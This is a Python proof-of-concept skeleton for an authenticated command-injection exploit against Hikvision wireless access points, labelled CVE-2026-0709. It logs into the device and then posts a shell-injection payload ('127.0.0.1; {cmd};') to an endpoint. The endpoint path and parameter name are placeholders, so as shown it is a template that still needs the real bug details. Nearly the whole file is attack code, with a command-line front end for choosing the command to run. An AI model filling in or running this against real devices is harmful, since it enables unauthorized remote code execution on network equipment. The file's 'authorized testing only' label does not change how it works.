#!/usr/bin/env python3
# PoC scanner/exploit skeleton for CVE-2026-0709 (Hikvision APs)
# FOR AUTHORIZED TESTING ONLY
#
# Skeleton only: the login flow, the endpoint path and the parameter name
# below are placeholders (see the docstrings of authenticate() and
# exploit_command_injection()); the script as written sends two generic
# form POSTs and prints whatever comes back.

import argparse
import requests
from urllib.parse import urljoin

# Every request below passes verify=False; this silences the urllib3
# insecure-request warning each such request would otherwise print.
requests.packages.urllib3.disable_warnings()


def build_base_url(host: str, port: int, https: bool = False) -> str:
    """Return ``scheme://host:port/`` for the target.

    The trailing slash matters: authenticate() and
    exploit_command_injection() build their URLs with urljoin(), which
    resolves a relative path beneath the last slash of the base.
    """
    scheme = "https" if https else "http"
    return f"{scheme}://{host}:{port}/"


def authenticate(base_url: str, username: str, password: str) -> requests.Session:
    """
    Adjust this to the real Hikvision login mechanism:
    - Could be HTTP basic auth
    - Could be a login form returning a session cookie/token

    Returns the requests.Session that performed the login, so any cookie
    the server set is carried into later requests made on that session.

    Raises RuntimeError when the login response status is not 200;
    exceptions raised by the POST itself (timeout, connection error)
    propagate unchanged.
    """
    session = requests.Session()
    # Example: form-based login (placeholder)
    login_url = urljoin(base_url, "login")
    data = {"username": username, "password": password}
    # verify=False: the server certificate is not validated, so these
    # credentials go to whatever answers at base_url, including an
    # interposed host.
    r = session.post(login_url, data=data, timeout=5, verify=False)
    if r.status_code != 200:
        raise RuntimeError(f"Login HTTP {r.status_code}")
    # TODO: check success condition properly (HTML, JSON, redirect, etc.)
    # As written, any 200 counts as success, whether or not a session was
    # actually established.
    return session


def exploit_command_injection(session: requests.Session, base_url: str, cmd: str) -> requests.Response:
    """
    This is the core of CVE-2026-0709:
    You must replace:
    - 'vulnerable/path' with the real endpoint
    - 'param' with the actual parameter name
    - HTTP method (GET/POST) and body/headers to match the real bug

    ``session`` is expected to be the one returned by authenticate(), so
    whatever cookie/token the login set is sent along with this request.

    Returns the raw requests.Response; nothing about it is interpreted
    here, the caller decides what to do with status and body.
    """
    vuln_path = "vulnerable/path"  # e.g. "api/diagnostic/ping"
    url = urljoin(base_url, vuln_path)
    # Example: parameter that gets passed to a shell command on the AP
    inj_payload = f"127.0.0.1; {cmd};"
    data = {
        "param": inj_payload  # replace with real name
    }
    # verify=False here as well: same certificate-validation caveat as in
    # authenticate().
    r = session.post(url, data=data, timeout=5, verify=False)
    return r


def main() -> None:
    """CLI entry point: parse arguments, log in, send one request, print the raw reply."""
    parser = argparse.ArgumentParser(
        description="Hikvision Wireless AP CVE-2026-0709 tester (authenticated RCE)"
    )
    parser.add_argument("--host", required=True, help="Target IP/hostname")
    parser.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
    parser.add_argument("--https", action="store_true", help="Use HTTPS instead of HTTP")
    parser.add_argument("-u", "--user", required=True, help="Username")
    # NOTE(review): the password is read from argv, so it is visible in the
    # process list and shell history of the host running this script.
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("--cmd", default="id", help="Command to execute (default: id)")
    args = parser.parse_args()

    base_url = build_base_url(args.host, args.port, args.https)

    try:
        print(f"[+] Authenticating to {base_url} as {args.user}")
        session = authenticate(base_url, args.user, args.password)
    except Exception as e:
        # Broad catch: connection errors, timeouts and authenticate()'s
        # RuntimeError all land here; the script reports and stops.
        print(f"[-] Authentication failed: {e}")
        return

    try:
        print(f"[+] Sending injection payload: {args.cmd}")
        r = exploit_command_injection(session, base_url, args.cmd)
        print(f"[+] HTTP {r.status_code}")
        print("[+] Response body:")
        # The full body is printed verbatim; nothing is parsed or truncated.
        print(r.text)
    except Exception as e:
        # Same broad catch as above for the second request.
        print(f"[-] Exploit request failed: {e}")


if __name__ == "__main__":
    main()